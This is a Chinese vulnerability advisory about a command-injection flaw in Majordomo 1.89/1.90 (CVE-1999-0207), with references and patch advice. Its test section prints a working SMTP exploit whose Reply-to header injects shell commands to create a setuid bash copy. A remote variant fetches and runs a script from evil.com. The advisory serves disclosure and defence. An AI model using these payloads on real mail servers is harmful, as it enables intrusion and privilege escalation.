安全研究
安全漏洞
Majordomo邮件列表管理软件远程执行任意命令漏洞
发布日期:1994-06-01
更新日期:1994-06-01
受影响系统:Great Circle Associates Majordomo 1.90
Great Circle Associates Majordomo 1.89
不受影响系统:Great Circle Associates Majordomo 1.94.5
Great Circle Associates Majordomo 1.94.4
Great Circle Associates Majordomo 1.91
描述:
BUGTRAQ ID:
2310
CVE(CAN) ID:
CVE-1999-0207
Majordomo是一个流行的用Perl实现的(majordomo.pl)处理邮件列表的软件。
1.94.3版本以下的Majordomo对邮件地址未做充分过滤,远程攻击者通过构造特殊的邮件地址可以在服务器上以Majordomo用户的权限执行任意命令。
<*来源:Razvan Dragomirescu (
drazvan@kappa.ro)
链接:
http://www.greatcircle.com/majordomo/OLD/majordomo.SECURITY_PATCH
http://bugtraq.inet-one.com/dir.1997-08/msg00105.html
http://www.cert.org/advisories/CA-1994-11.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Razvan Dragomirescu (
drazvan@kappa.ro)提供了如下测试方法:
Local exploit:
--exploit--
telnet localhost 25
helo localhost
mail from: user
rcpt to: majordomo (or whatever the name of the majordomo user is)
data
From: user
To: majordomo
Reply-to: a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod\${IFS}4777\${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro
LISTS
.
quit
--end of exploit --
For the remote users, change the Reply-to field to something like:
Reply-to: a~.`/usr/bin/rcp\${IFS}
user@evil.com:script\${IFS}/tmp/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=blu\\\@kappa.ro
建议:
厂商补丁:
Great Circle Associates
-----------------------
目前厂商已经在新版本的软件中修复了这个安全问题,请到厂商的主页下载:
http://www.greatcircle.com/majordomo/浏览次数:37331
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |